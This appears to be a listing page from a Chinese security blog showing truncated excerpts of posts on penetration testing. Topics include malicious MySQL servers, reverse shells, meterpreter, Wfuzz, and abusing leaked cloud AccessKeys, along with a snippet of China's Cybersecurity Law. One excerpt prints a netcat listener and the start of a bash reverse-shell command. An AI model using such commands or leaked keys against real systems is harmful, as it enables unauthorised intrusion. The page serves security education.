moonsec

mysql协议中流程和go语言实现的恶意mysql服务器:https://blog.csdn.net/ls1120704214/article/details/88174003 p…

第一章　总　　则 第一条 为了保障网络安全，维护网络空间主权和国家安全、社会公共利益，保护公民、法人和其他组织的合法权益，促进经济社会信息化健康发展，制定本法。 第二条 在中华人民…

端口映射 将WEB服务器的80端口映射到ubuntu上的80端口 ubuntu执行 socat -d -d -d tcp-l:8080,reuseaddr,bind=0.0.0.0…

在linux反弹建立交互的时候会出现乱码 不能补全文件，方向键也会出现乱码。 解决办法 1.建立交互shell kali nc -vlnp 8080 bash -i >&am…

Wfuzz（一款支持各种Web漏洞扫描的工具） Wfuzz是一款Web应用程序暴力破解工具。它可以通过遍历以发现隐藏的资源（例如：目录、脚本和servlets等）。Wfuzz能够穷…

1 应用场景 在多个或者两个不网络中使用正向连接远程的攻击载荷，但是有时会有限制，如防火墙同事也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻…

1.以管理员的身份运行cmd，输入命令：wmic qfe get hotfixid >> c:\list.txt 2.打开C盘下的list.txt 将第一行的内容删除后…

作者：mx7krshell 标题有点跨张了，主要是云租户的渗透思路。 这篇文章写了很久，也放了很久，在公司内部发表过，所以很难体现这篇文章的价值，也无人关注，也无人看懂，所以还是发…

内容不太适合以公开的形式发布， 做项目时候发现AWS与某云OSS的AccessKey，然后去某云官网看文档发现很多有意思的东西。 文章整体结构： 渗透场景 云术语了解 创建一个OS…